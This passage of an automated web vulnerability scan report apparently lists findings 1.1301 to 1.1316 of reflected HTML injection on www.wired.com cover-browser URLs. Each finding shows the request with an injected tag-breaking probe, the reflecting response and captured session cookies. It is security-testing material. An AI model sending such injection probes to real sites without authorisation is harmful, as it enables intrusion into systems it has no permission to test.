Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:12:09 GMT
Date: Mon, 22 Nov 2010 01:08:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_1996e82c0"><a>d25d8be8dce">
...[SNIP]...

1.1301. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1997

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a17"><a>f51bea8abc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser70a17"><a>f51bea8abc9/1997 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:11:38 GMT
Date: Mon, 22 Nov 2010 01:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser70a17"><a>f51bea8abc9 c_1997">
...[SNIP]...

1.1302. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1997

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9bb"><a>55ff099ec8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/1997ed9bb"><a>55ff099ec8c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:15 GMT
Date: Mon, 22 Nov 2010 01:08:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_1997ed9bb"><a>55ff099ec8c">
...[SNIP]...

1.1303. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1998

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc6db"><a>7a1cb95c9c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowserfc6db"><a>7a1cb95c9c8/1998 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:11:37 GMT
Date: Mon, 22 Nov 2010 01:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowserfc6db"><a>7a1cb95c9c8 c_1998">
...[SNIP]...

1.1304. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1998

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0ca"><a>d40bc3e4695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/19984e0ca"><a>d40bc3e4695 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:08 GMT
Date: Mon, 22 Nov 2010 01:08:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_19984e0ca"><a>d40bc3e4695">
...[SNIP]...

1.1305. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1999

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3335a"><a>6fb29d915a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser3335a"><a>6fb29d915a6/1999 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:11:15 GMT
Date: Mon, 22 Nov 2010 01:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser3335a"><a>6fb29d915a6 c_1999">
...[SNIP]...

1.1306. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1999

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff2c"><a>a871307756c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/19995ff2c"><a>a871307756c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:11:54 GMT
Date: Mon, 22 Nov 2010 01:08:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_19995ff2c"><a>a871307756c">
...[SNIP]...

1.1307. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2000

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3c2"><a>0a5f2735ed6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowsercd3c2"><a>0a5f2735ed6/2000 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:11:27 GMT
Date: Mon, 22 Nov 2010 01:07:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowsercd3c2"><a>0a5f2735ed6 c_2000">
...[SNIP]...

1.1308. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2000

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65112"><a>9f2ff113a98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/200065112"><a>9f2ff113a98 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:11:44 GMT
Date: Mon, 22 Nov 2010 01:08:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_200065112"><a>9f2ff113a98">
...[SNIP]...

1.1309. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e90"><a>6d2dca21409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser94e90"><a>6d2dca21409/2001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=226
Expires: Mon, 22 Nov 2010 01:11:11 GMT
Date: Mon, 22 Nov 2010 01:07:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser94e90"><a>6d2dca21409 c_2001">
...[SNIP]...

1.1310. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8f1"><a>e333a4050b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/2001ea8f1"><a>e333a4050b9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:01 GMT
Date: Mon, 22 Nov 2010 01:08:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_2001ea8f1"><a>e333a4050b9">
...[SNIP]...

1.1311. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2002

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9ec"><a>4c7ba26d603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser8b9ec"><a>4c7ba26d603/2002 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:11:26 GMT
Date: Mon, 22 Nov 2010 01:07:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser8b9ec"><a>4c7ba26d603 c_2002">
...[SNIP]...

1.1312. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2002

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81f35"><a>ab191808721 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/200281f35"><a>ab191808721 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:05 GMT
Date: Mon, 22 Nov 2010 01:08:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_200281f35"><a>ab191808721">
...[SNIP]...

1.1313. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2003

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e568a"><a>3927a2b838d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowsere568a"><a>3927a2b838d/2003 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=238
Expires: Mon, 22 Nov 2010 01:11:23 GMT
Date: Mon, 22 Nov 2010 01:07:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowsere568a"><a>3927a2b838d c_2003">
...[SNIP]...

1.1314. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2003

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad8e"><a>70680a83295 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/20037ad8e"><a>70680a83295 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:05 GMT
Date: Mon, 22 Nov 2010 01:08:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_20037ad8e"><a>70680a83295">
...[SNIP]...

1.1315. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2004

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d956"><a>451286b1b41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser3d956"><a>451286b1b41/2004 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Mon, 22 Nov 2010 01:11:18 GMT
Date: Mon, 22 Nov 2010 01:07:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser3d956"><a>451286b1b41 c_2004">
...[SNIP]...

1.1316. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2004

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4001"><a>2a88692267f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

